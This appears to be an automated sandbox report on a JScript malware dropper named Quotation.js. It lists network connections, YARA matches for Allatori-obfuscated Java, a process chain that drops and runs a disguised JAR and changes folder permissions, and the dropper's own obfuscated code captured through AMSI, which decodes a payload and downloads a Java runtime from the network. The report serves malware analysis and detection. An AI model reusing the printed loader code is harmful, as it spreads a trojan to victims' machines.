        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49785 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49803 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49804 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49811 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49818 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49822 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49821 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49829 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49835 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49837 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49839 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49848 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49854 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49855 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49856 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49873 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49874 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49875 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49886 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49891 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49893 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49894 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49904 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49908 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49911 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49912 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49923 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49927 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49928 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49931 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49942 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49946 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49944 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49950 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49961 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49963 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49964 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49968 version: TLS 1.2

        System Summary

        barindex
        Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTRMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: Quotation.jsInitial sample: Strings found which are bigger than 50
        Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: classification engineClassification label: mal92.troj.evad.winJS@6/4@5/2
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\nvbyatbnf.txtJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeMutant created: NULL
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Quotation.jsReversingLabs: Detection: 18%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript[CklqdFL[47]](CklqdFL[4]);var xExBLqTbXh = kYfpnX_qCl[CklqdFL[48]](CklqdFL[5]);var izPTBQ_jTC = kYfpnX_qCl[CklqdFL[48]](CklqdFL[6]);var r = Math[CklqdFL[50]]()[CklqdFL[51]](36)[CklqdFL[46]](/[^a-z]+/g, '')[CklqdFL[53]](0, 10);var JlhwENqfnl = izPTBQ_jTC + CklqdFL[7] + r + CklqdFL[8]var ZaAtmiMBKG = decodeBase64(N$cvYJbgCP);writeBytes(JlhwENqfnl, ZaAtmiMBKG);var PajvHKk$Px = WScript[CklqdFL[47]](CklqdFL[9]);var KewZ$_ybVX = "";try{KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[10]);KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[11] + KewZ$_ybVX + CklqdFL[12]);}catch(err){}try{if(KewZ$_ybVX == ""){KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[13]);KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[14] + KewZ$_ybVX + CklqdFL[12]);if(KewZ$_ybVX != ""){KewZ$_ybVX = KewZ$_ybVX + CklqdFL[16];}}else{KewZ$_ybVX = KewZ$_ybVX + CklqdFL[16];}}catch(err){}try{if(KewZ$_ybVX != ""){kYfpnX_qCl[CklqdFL[59]](CklqdFL[18] + KewZ$_ybVX + CklqdFL[19] + JlhwENqfnl + CklqdFL[18]);} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var aPMLihZuGt = WScript[CklqdFL[47]](CklqdFL[21]);var dKx_NIcKPU = WScript[CklqdFL[47]](CklqdFL[22]);aPMLihZuGt[CklqdFL[62]](CklqdFL[23], CklqdFL[24], false);aPMLihZuGt[CklqdFL[63]](2, 13056);aPMLihZuGt[CklqdFL[64]]();dKx_NIcKPU[CklqdFL[65]] = 1;dKx_NIcKPU[CklqdFL[62]]();dKx_NIcKPU.write(aPMLihZuGt[CklqdFL[67]]);dKx_NIcKPU[CklqdFL[68]](izPTBQ_jTC + CklqdFL[25], 2);break;}catch(err){WScript[CklqdFL[69]](5000);}}while(true);UnZip(izPTBQ_jTC + CklqdFL[25], izPTBQ_jTC + CklqdFL[27]);kYfpnX_qCl[CklqdFL[70]](CklqdFL[28], CklqdFL[18] + izPTBQ_jTC + CklqdFL[30] + CklqdFL[18] + JlhwENqfnl + CklqdFL[18], CklqdFL[33]);kYfpnX_qCl[CklqdFL[59]](CklqdFL[18] + izPTBQ_jTC + CklqdFL[30] + CklqdFL[18] + JlhwENqfnl + CklqdFL[18]);}function decodeBase64(base64){var DM = WScript[CklqdFL[47]](CklqdFL[38]);var EL = DM[CklqdFL[73]](CklqdFL[39]);EL[CklqdFL[74]] = CklqdFL[40];EL[CklqdFL[75]] = base64;return 